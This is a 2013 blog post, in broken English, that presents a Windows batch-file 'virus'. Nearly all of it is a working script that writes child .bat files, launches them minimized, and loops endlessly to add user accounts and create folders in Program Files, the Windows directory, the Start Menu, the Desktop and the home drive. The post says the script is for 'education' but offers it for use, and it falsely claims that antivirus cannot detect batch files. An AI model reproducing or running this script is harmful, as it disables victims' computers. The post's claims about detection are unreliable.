Tuesday, 2 April 2013

Batch programming-trending world wide

Batch programming-trending world wide:-


Hello  Frndz i m here to talk about Batch programing. Batch files are those  which use in system file.

So no one antivirus recognize them.so in case of   windows  virus are  mainly  have  Extension (.EXE,.COM,.BAT) these files are mainly windows file so a sytem can't take them as a threat.



  • So virus maker make viruses on  these extensions.


Here an example of viruse which is destroy a whole computer.so use it smartly & only on education purpose.


Example:-


@ECHO OFF
@ECHO Rathor Creation
@ECHO MAIN BAT RUNNING
 GOTO start



:start



 @ECHO SET magic2=1 >> bat6.bat

 @ECHO GOTO flood5 >> bat6.bat

 @ECHO :flood5 >> bat6.bat

 @ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat

 @ECHO NET USER magic2%%magic2%% /add >> bat6.bat

 @ECHO GOTO flood5 >> bat6.bat

  START /MIN bat6.bat



GOTO bat5


:bat5



 @ECHO CD %%ProgramFiles%%\ >> bat5.bat

 @ECHO SET pogo=1 >> bat5.bat

 @ECHO GOTO flood4 >> bat5.bat

 @ECHO :flood4 >> bat5.bat

 @ECHO MKDIR pogo%%pogo%% >> bat5.bat

 @ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat

 @ECHO GOTO flood4 >> bat5.bat

  START /MIN bat5.bat

 GOTO bat4


:bat4


@ECHO CD %%SystemRoot%%\ >> bat4.bat

@ECHO SET hat=1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

@ECHO :flood3 >> bat4.bat

@ECHO MKDIR hat%%hat%% >> bat4.bat

@ECHO SET /a hat=%%hat%%+1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

 START /MIN bat4.bat



GOTO bat3


:bat3




@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat

@ECHO SET chart=1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

@ECHO :flood2 >> bat3.bat

@ECHO MKDIR chart%%chart%% >> bat3.bat

@ECHO SET /a chart=%%chart%%+1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

 START /MIN bat3.bat



 GOTO bat2


:bat2



@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat

@ECHO SET gamer=1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

@ECHO :flood >> bat2.bat

@ECHO MKDIR gamer%%gamer%% >> bat2.bat

@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

 START /MIN bat2.bat



GOTO original


:original

CD %HomeDrive%\

SET Rathor=1



GOTO flood1



:flood1



MKDIR Rathor%Rathor%

SET /a Rathor=%sRathor%+1

GOTO flood1


0 comments:

Post a Comment